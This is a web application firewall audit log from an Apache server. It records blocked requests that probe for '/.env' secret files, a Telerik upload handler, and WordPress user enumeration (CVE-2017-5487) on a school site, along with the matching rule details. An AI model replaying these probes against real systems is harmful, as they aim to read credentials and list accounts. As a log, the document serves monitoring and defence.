Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --993e5236-Z-- --3d6d011d-A-- [26/May/2025:02:49:38 +0700] aDN0UterygsLmB9N_YSxrQAAAJQ 103.236.140.4 33466 103.236.140.4 8181 --3d6d011d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --3d6d011d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d6d011d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748202578501763 809 (- - -) Stopwatch2: 1748202578501763 809; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d6d011d-Z-- --df237762-A-- [26/May/2025:03:04:12 +0700] aDN3vNerygsLmB9N_YSz1QAAAJQ 103.236.140.4 42892 103.236.140.4 8181 --df237762-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 162.243.233.172 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 162.243.233.172 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --df237762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df237762-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748203452506380 684 (- - -) Stopwatch2: 1748203452506380 684; combined=283, p1=253, p2=0, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df237762-Z-- --097dc80c-A-- [26/May/2025:03:22:01 +0700] aDN76derygsLmB9N_YS1HgAAAIM 103.236.140.4 49862 103.236.140.4 8181 --097dc80c-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.156.129.54 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.156.129.54 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --097dc80c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --097dc80c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748204521461951 2422 (- - -) Stopwatch2: 1748204521461951 2422; combined=1133, p1=403, p2=702, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --097dc80c-Z-- --6e8ce41a-A-- [26/May/2025:04:08:08 +0700] aDOGuFSmKJQK-9oQ9SRPdgAAAIM 103.236.140.4 50890 103.236.140.4 8181 --6e8ce41a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.89.71.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.89.71.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6e8ce41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e8ce41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748207288685484 3414 (- - -) Stopwatch2: 1748207288685484 3414; combined=1525, p1=475, p2=1016, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e8ce41a-Z-- --39001d14-A-- [26/May/2025:04:33:37 +0700] aDOMsVSmKJQK-9oQ9SRPqAAAAJA 103.236.140.4 51088 103.236.140.4 8181 --39001d14-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept-Charset: utf-8 --39001d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39001d14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748208817178866 883 (- - -) Stopwatch2: 1748208817178866 883; combined=392, p1=352, p2=0, p3=0, p4=0, p5=40, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39001d14-Z-- --4d4c851b-A-- [26/May/2025:04:51:06 +0700] aDOQynFOzWd_Ai7zJXXXwwAAABA 103.236.140.4 51170 103.236.140.4 8181 --4d4c851b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; Lenovo A6010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --4d4c851b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d4c851b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748209866292573 937 (- - -) Stopwatch2: 1748209866292573 937; combined=364, p1=323, p2=0, p3=0, p4=0, p5=41, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d4c851b-Z-- --c7946e1e-A-- [26/May/2025:04:59:24 +0700] aDOSvFSmKJQK-9oQ9SRP6gAAAIg 103.236.140.4 51306 103.236.140.4 8181 --c7946e1e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.124.43.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.124.43.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c7946e1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7946e1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748210364096055 2177 (- - -) Stopwatch2: 1748210364096055 2177; combined=1082, p1=362, p2=692, p3=0, p4=0, p5=27, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7946e1e-Z-- --8af54f65-A-- [26/May/2025:05:05:04 +0700] aDOUEHFOzWd_Ai7zJXXXxAAAABE 103.236.140.4 51326 103.236.140.4 8181 --8af54f65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto g(6)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --8af54f65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af54f65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748210704139743 797 (- - -) Stopwatch2: 1748210704139743 797; combined=348, p1=298, p2=0, p3=0, p4=0, p5=50, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af54f65-Z-- --42d32b68-A-- [26/May/2025:05:58:11 +0700] aDOgg1SmKJQK-9oQ9SRSGgAAAI4 103.236.140.4 52730 103.236.140.4 8181 --42d32b68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.150.216.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.150.216.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --42d32b68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42d32b68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748213891280985 2820 (- - -) Stopwatch2: 1748213891280985 2820; combined=1264, p1=447, p2=787, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42d32b68-Z-- --8a906563-A-- [26/May/2025:07:09:14 +0700] aDOxKlSmKJQK-9oQ9SRShAAAAII 103.236.140.4 53160 103.236.140.4 8181 --8a906563-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; Nexus 7 Build/KTU84P) AppleWebKit/537.36 (KHTML like Gecko) Chrome/36.0.1985.135 Safari/537.36 Accept-Charset: utf-8 --8a906563-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a906563-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748218154447345 866 (- - -) Stopwatch2: 1748218154447345 866; combined=374, p1=334, p2=0, p3=0, p4=0, p5=40, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a906563-Z-- --294cff02-A-- [26/May/2025:07:09:15 +0700] aDOxK1SmKJQK-9oQ9SRShQAAAIc 103.236.140.4 53162 103.236.140.4 8181 --294cff02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; LG-H932) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --294cff02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --294cff02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748218155710022 934 (- - -) Stopwatch2: 1748218155710022 934; combined=420, p1=379, p2=0, p3=0, p4=0, p5=41, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --294cff02-Z-- --0294557b-A-- [26/May/2025:07:37:48 +0700] aDO33FSmKJQK-9oQ9SRSnwAAAIc 103.236.140.4 53250 103.236.140.4 8181 --0294557b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.89.186.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.89.186.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0294557b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0294557b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748219868110542 3517 (- - -) Stopwatch2: 1748219868110542 3517; combined=1488, p1=505, p2=950, p3=0, p4=0, p5=33, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0294557b-Z-- --fb5f1f2f-A-- [26/May/2025:08:03:26 +0700] aDO93lSmKJQK-9oQ9SRStQAAAJU 103.236.140.4 53392 103.236.140.4 8181 --fb5f1f2f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.170.203.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.170.203.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fb5f1f2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb5f1f2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748221406294842 3550 (- - -) Stopwatch2: 1748221406294842 3550; combined=1521, p1=536, p2=953, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb5f1f2f-Z-- --1de27c62-A-- [26/May/2025:09:17:51 +0700] aDPPT3FOzWd_Ai7zJXXZxAAAAAE 103.236.140.4 57212 103.236.140.4 8181 --1de27c62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --1de27c62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1de27c62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748225871310655 750 (- - -) Stopwatch2: 1748225871310655 750; combined=311, p1=274, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1de27c62-Z-- --cd5c2067-A-- [26/May/2025:09:29:51 +0700] aDPSH1SmKJQK-9oQ9SRVNAAAAI0 103.236.140.4 57342 103.236.140.4 8181 --cd5c2067-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.195.247.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.195.247.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cd5c2067-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd5c2067-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748226591122164 3065 (- - -) Stopwatch2: 1748226591122164 3065; combined=1338, p1=477, p2=832, p3=0, p4=0, p5=29, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd5c2067-Z-- --c801e425-A-- [26/May/2025:09:45:10 +0700] aDPVts-W3hHsdQpQwdT0mgAAANY 103.236.140.4 57416 103.236.140.4 8181 --c801e425-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --c801e425-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c801e425-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748227510823261 860 (- - -) Stopwatch2: 1748227510823261 860; combined=345, p1=301, p2=0, p3=0, p4=0, p5=43, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c801e425-Z-- --6f526644-A-- [26/May/2025:10:21:45 +0700] aDPeSc-W3hHsdQpQwdT0yQAAAM0 103.236.140.4 57720 103.236.140.4 8181 --6f526644-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.231.115.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6f526644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f526644-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748229705081728 3118 (- - -) Stopwatch2: 1748229705081728 3118; combined=1372, p1=444, p2=892, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f526644-Z-- --2db95401-A-- [26/May/2025:10:31:16 +0700] aDPghM-W3hHsdQpQwdT00AAAAMU 103.236.140.4 57764 103.236.140.4 8181 --2db95401-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.130.232.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.130.232.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2db95401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db95401-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748230276669255 3518 (- - -) Stopwatch2: 1748230276669255 3518; combined=1499, p1=473, p2=994, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
